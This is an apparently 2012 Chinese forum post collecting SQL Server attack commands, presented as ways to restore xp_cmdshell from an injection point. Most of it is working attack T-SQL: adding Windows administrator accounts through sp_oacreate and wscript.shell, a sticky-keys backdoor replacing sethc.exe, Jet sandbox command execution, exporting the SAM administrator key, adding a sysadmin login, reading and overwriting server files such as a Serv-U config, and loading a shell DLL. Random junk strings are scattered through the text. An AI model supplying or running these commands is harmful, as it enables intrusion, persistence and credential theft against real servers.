标题: XP_CMDSHELL恢复方法大全 作者: admin 时间: 2012-9-15 14:37 标题: XP_CMDSHELL恢复方法大全 1 未能找到存储过程 'master..xp_cmdshell'. EXEC master.dbo.sp_addextendedproc 后用下面的三种方法,在注入点上执行加个空格和;号 恢复方法:查询分析器连接后,
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
然后按F5键,命令执行完毕
2 无法装载 DLL xpsql70.dll 或该 DLL 所引用的某一 DLL。原因 126(找不到指定模块。)
恢复方法:查询分析器连接后,
第一步执行:EXEC master.dbo.sp_dropextendedproc "xp_cmdshell"
第二步执行:EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
然后按F5键,命令执行完毕
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
恢复方法:查询分析器连接后,
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
然后按F5键,命令执行完毕
4 终极方法.% K9 ]% z9 Q8 z& U$ {0 k) n
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:) ^+ ?# l v3 e: o H* R
查询分离器连接后," i( {6 `. d, ~! \
2000servser系统: 5 }; r8 y# x2 cdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add' 2 T! c6 p, z5 g/ ]2 V/ u. h5 C& M8 D- o. _: P; h+ Y/ W
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add'7 x7 ^, t0 A( `" ^# \
xp或2003server系统:, v Z0 R3 ?% n: [/ Z
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'& f, S! q1 o( U" ^, {5 e
& X/ s0 h% f+ _3 t, G: E8 Gdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'0 i. ~. j: N" Q
五个SHIFT, x3 a1 p& l. H# E
declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';7 M2 u# U1 `3 V! F8 Q3 m- w _
?3 O( J1 a# _' q7 adeclare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe'; - r6 A. [9 o) r: b ?! L
xp_cmdshell执行命令另一种方法) M" c& \1 ?* h
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'net user refdom 123456 /add' 6 e W3 @8 j: @/ n U5 f( u
判断扩展存储过程是否存在
Select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
返回结果为 1 即表示该扩展存储过程存在
上传xplog70.dll恢复xp_cmdshell语句: 3 Z/ h. s- m4 I: D# dsp_addextendedproc xp_cmdshell,@dllname='E:\newche2\about\XPLOG70.DLL'% n* I) M9 m; |5 v
9 W5 v' o/ m7 t否则上传xplog7.0.dll1 w5 K0 Q& C. `/ |7 Y
Exec master.dbo.addextendedproc 'xp_cmdshell','C:\WinNt\System32\xplog70.dll'. G% Y4 S, m) @6 [4 [- D. @% m
首先开启沙盘模式:( [, T. ]0 Q% ^# j n2 e3 p6 [! W
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1 % ~, @$ `9 G' k4 D4 ^3 H* O: p4 u* m . T$ A) v* M. |: k9 p' ^" e然后利用jet.oledb执行系统命令8 }% q, q% n3 A3 t6 j R8 ?
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")') - e/ p6 L) T1 N0 ?# S返回 不能找到c:\windows\system32\ias\ias.mdb错误,用exec master..xp_dirtree 'c:\windows\system32\ias\ias',1,1-- 发现c:\windows\system32\ias\ias.mdb没了,应该是被管理员删掉了,还有另一个mdb也没了 8 e; C/ }) \0 z9 E6 r. \5 G" \4 ^% K& ]( ]! e8 u) e0 }" r5 ^
恢复过程 sp_addextendedproc 如下:
create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (owner.)name of function to call */
@dllname varchar(255)/* name of DLL containing function */
as
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sp_addextendedproc')
return (1)
end
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
GO
* N, F+ E h, y; [ l$ \. x - x2 L- {/ x2 `5 @7 I- f4 i- X导出管理员密码文件+ Y) T; v- G- z x
sa默认可以读sam键.应该。2 e( N0 _0 M. M. {
reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg $ E. y6 K# K7 T i" F! p0 ?net user administrator test2 H4 K6 [# m5 {5 N& V1 S1 ], p+ G# k
用administrator登陆.% a# J- f1 l% C9 V
用完机器后3 V/ @; \# p, ~3 v/ H9 o" G
reg import c:\test.reg ; y0 M1 P$ v8 z' u. c根本不用克隆.. V: ]: {) ^% ]& \6 j: m% L
找到对应的sid. 7 l: j2 i+ s8 X : ?/ f: _8 J7 p9 D' `# q2 t, @ ! y! |) L# p6 ?/ [( F7 |+ @6 L( E' ]8 L3 }2 A+ o
恢复所有存储过程 / [1 H$ _9 J) S g( |- o( |' Iuse master $ k# \+ ?5 |4 F# n- \5 R8 J( M2 `exec sp_addextendedproc xp_enumgroups,'xplog70.dll' . t, q9 F+ j3 F$ X5 {
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll' ; R8 R( j, P+ Q- ^. M5 b/ ]
exec sp_addextendedproc xp_loginconfig,'xplog70.dll' ; o8 Z6 K5 |3 z$ K5 o3 x$ Hexec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll' 4 Z9 @) Y- F4 k0 E! x% I
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll' 6 H) Z' P2 Q( S" ^
exec sp_addextendedproc sp_OACreate,'odsole70.dll' 5 R) r! _) m; s1 J) j a/ vexec sp_addextendedproc sp_OADestroy,'odsole70.dll' : p5 }; _0 d) ?
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll' ' K- w$ z( I! \3 S9 f, Nexec sp_addextendedproc sp_OAGetProperty,'odsole70.dll' ; V( L: K/ h1 d, i* Q& M9 u, c( Z
exec sp_addextendedproc sp_OAMethod,'odsole70.dll' # U x1 w- c* c' Qexec sp_addextendedproc sp_OASetProperty,'odsole70.dll' 3 S/ V7 i) w, Z3 _, a4 X
exec sp_addextendedproc sp_OAStop,'odsole70.dll' - Q/ N6 V: f/ f' f
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll' 1 k) w$ ]4 k# A, Eexec sp_addextendedproc xp_regdeletekey,'xpstar.dll' Q" P' u* I2 W L5 @
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll' / U1 {& K( ~: Z, ]% w/ Q0 g. R
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll' # I" b# h; P" _& a, a K# u
exec sp_addextendedproc xp_regread,'xpstar.dll' " h7 g6 I) b% U# F
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll' * s( }+ Y2 N# I1 C7 n3 Eexec sp_addextendedproc xp_regwrite,'xpstar.dll' $ A- Z8 l0 J5 N/ X+ ^ c9 e e
exec sp_addextendedproc xp_availablemedia,'xpstar.dll' 7 e4 ^0 C' F J9 _: T1 }, I * C* y, u4 N2 i " i8 c" T# O6 H. e9 W) p建立读文件的存储过程 4 T) ]1 d. q+ G( o$ V" n" Q9 ?Create proc sp_readTextFile @filename sysname" k4 W9 T/ s9 b% A8 Z8 c2 X
as " q' s1 W" l' L 6 q2 |: s$ h1 c+ G! ]4 c6 f B begin : I" f! G- Y; ^! C1 u+ w; W set nocount on 1 b. x+ p; ?6 e) O Create table #tempfile (line varchar(8000)) . n5 i' P2 Y* T7 x( I# ? exec ('bulk insert #tempfile from "' + @filename + '"')7 s6 a* D. w. k& a/ x- z
select * from #tempfile ) y1 W) j4 ~0 E! Q$ J# n3 \0 Z drop table #tempfile6 _6 N' {1 l1 s4 ]) G
End* F/ B4 }+ ?# t) Z* M
exec sp_readTextFile 'D:\testjun17\Teleweb-Japan\default.asp' 利用建立的存储过程读文件& b }2 t' x5 [% x( ?
查看登录用户 ! R2 g" i* f% e4 [0 sSelect * from sysxlogins/ i/ t8 \, Z7 u4 {2 J
2 i% V6 W4 m. p! u* w把文件内容读取到表中* n8 R; J( }+ L8 ~2 i, e, h
BULK INSERT tmp from "c:\test.txt" ( H# c) R1 M' Z$ B' ?dElete from 表名 清理表里的内容7 k9 x% z1 C2 k7 [3 M
create table b_test(fn nvarchar(4000));建一个表,字段为fn / H4 Q- W& ], s5 |5 A* T * N( D. U' ]7 D 6 r* O/ h. H) F, o+ R% a* D$ m- {4 n加sa用户 3 {* f& E3 f, J7 N( |3 mexec master.dbo.sp_addlogin user,pass; 3 d5 g, i/ e, e" kexec master.dbo.sp_addsrvrolemember user,sysadmin ; W: ~/ T0 |$ R6 ~ 0 g1 ]' o* ~! X: b- [ # j4 P% m5 e$ T6 k. ?% L: W- B, C' j; [$ M2 D6 B6 @6 G
读文件代码 & b) h. _3 E! V' Y: M8 ~2 Edeclare @o int, @f int, @t int, @ret int 4 s- t- j7 E8 L4 c5 m: ]. j# qdeclare @line varchar(8000) ; z d, {5 P o* X" y' }exec sp_oacreate 'scripting.filesystemobject', @o out6 G7 g; U$ Z! I; i- w7 [, x
exec sp_oamethod @o, 'opentextfile', @f out, '文件名', 1 ' @- a2 b2 b2 e# S+ r( f* l1 C' c! K# ^$ Aexec @ret = sp_oamethod @f, 'readline', @line out3 X$ s" W7 i v% Z; _$ u+ P/ K
while( @ret = 0 )6 z8 x. F2 | z/ a+ H% U
begin9 I- `9 X4 n6 r
print @line # x4 g% O, a; |6 Oexec @ret = sp_oamethod @f, 'readline', @line out1 e8 O( _" ^4 w# B% ^* S$ s
end * e0 O8 o+ \; ]9 s. W $ ~( B$ K" c P0 G6 R7 O0 k- Y8 o. v ' f9 d9 I. b: J& r( _ v4 U& Y- d写文件代码: 3 v3 z( f, t" `; N$ wdeclare @o int, @f int, @t int, @ret int # `1 F% R/ o& ^6 g/ [exec sp_oacreate 'scripting.filesystemobject', @o out+ t+ F5 T! t) R
exec sp_oamethod @o, 'createtextfile', @f out, 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini', 1. q3 `7 D1 v. A# \2 T8 U
exec @ret = sp_oamethod @f, 'writeline', NULL, 《内容》% p; S% y' L* H3 M8 e' X$ S9 f" P) j. d
6 X/ t0 l5 c l1 X% v6 f) s - y: M. I) W( a4 Q添加lake2 shell- _' t3 [, ]' N) E. J
sp_addextendedproc 'xp_lake2', 'c:\recycler\xplake2.dll' ! v# v. d$ \: Y& r6 Ksp_dropextendedproc xp_lake29 D$ Z( l/ l7 \* l- ]$ n& \; [& z. L
EXEC xp_lake2 'net user'& Q! t- c$ X5 Y& S* s" M% L